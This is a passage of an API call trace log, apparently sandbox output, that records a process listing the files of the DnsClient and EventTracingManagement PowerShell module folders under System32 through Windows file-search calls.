"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0227.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0227.877] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2130 [0227.877] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.877] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0227.877] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0227.878] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.878] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0227.878] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.878] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0227.878] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.879] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0227.879] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0227.879] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0227.879] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0227.879] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0227.880] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0227.880] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0227.880] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0227.880] FindNextFileW (in: hFindFile=0x25b73cd2130, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 0 [0227.880] FindClose (in: hFindFile=0x25b73cd2130 | out: hFindFile=0x25b73cd2130) returned 1 [0227.881] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1")) returned 0x20 [0227.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0227.881] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2010 [0227.881] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.882] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0227.882] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.882] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0227.882] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0227.883] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0227.883] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0227.883] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0227.883] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0227.884] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 0 [0227.884] FindClose (in: hFindFile=0x25b73cd2010 | out: hFindFile=0x25b73cd2010) returned 1 [0227.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0227.885] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1dd0 [0227.886] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.886] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0227.886] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.886] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0227.887] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0227.887] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0227.887] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0227.887] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0227.887] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0227.888] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.888] FindClose (in: hFindFile=0x25b73cd1dd0 | out: hFindFile=0x25b73cd1dd0) returned 1 [0227.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0227.888] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: 